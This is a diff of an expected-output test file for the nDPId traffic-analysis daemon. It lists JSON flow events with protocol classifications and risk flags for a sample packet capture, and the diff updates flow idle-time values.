+00933{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1470104380890,"flow_last_seen":1470104382084,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":9883,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"42.120.51.152","src_port":49609,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104420438,"flow_last_seen":1470104420540,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1470104397807,"flow_last_seen":1470104414604,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":959,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59461,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} @@ -596,7 +596,7 @@ 00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104379579,"flow_last_seen":1470104379579,"flow_idle_time":180000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":244,"flow_tot_l4_payload_len":465,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.67","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381217,"flow_last_seen":1470104381626,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":56366,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104412556,"flow_last_seen":1470104412962,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":64568,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00932{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104380188,"flow_last_seen":1470104380928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00932{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104380188,"flow_last_seen":1470104380928,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":392,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381935,"flow_last_seen":1470104382038,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104381935,"flow_last_seen":1470104382036,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":58456,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} @@ -607,31 +607,31 @@ 00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104411327,"flow_last_seen":1470104411735,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":54506,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1470104377634,"flow_last_seen":1470104415729,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1096,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"239.255.255.250","src_port":60267,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104392380,"flow_last_seen":1470104392380,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59789,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104375419,"flow_last_seen":1470104398314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104375419,"flow_last_seen":1470104398314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104375419,"flow_last_seen":1470104398314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104375419,"flow_last_seen":1470104398314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104399959,"flow_last_seen":1470104400366,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104389597,"flow_last_seen":1470104425786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104389597,"flow_last_seen":1470104425786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104389597,"flow_last_seen":1470104425786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104389597,"flow_last_seen":1470104425786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104385827,"flow_last_seen":1470104420541,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"59.120.208.218","dst_ip":"255.255.255.255","src_port":50151,"dst_port":1947,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104385827,"flow_last_seen":1470104420541,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"59.120.208.218","dst_ip":"255.255.255.255","src_port":50151,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104390443,"flow_last_seen":1470104422398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104390443,"flow_last_seen":1470104422398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104403134,"flow_last_seen":1470104403234,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":58702,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104391254,"flow_last_seen":1470104391361,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104416855,"flow_last_seen":1470104416959,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104416855,"flow_last_seen":1470104416958,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104391199,"flow_last_seen":1470104391208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104391199,"flow_last_seen":1470104391208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104391199,"flow_last_seen":1470104391208,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104391199,"flow_last_seen":1470104391208,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104378045,"flow_last_seen":1470104378454,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104377754,"flow_last_seen":1470104422913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1218,"flow_tot_l4_payload_len":2048,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104379903,"flow_last_seen":1470104379989,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2665,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1470104379916,"flow_last_seen":1470104380338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":33005,"flow_avg_l4_payload_len":660,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104378906,"flow_last_seen":1470104424115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":734,"flow_tot_l4_payload_len":1576,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 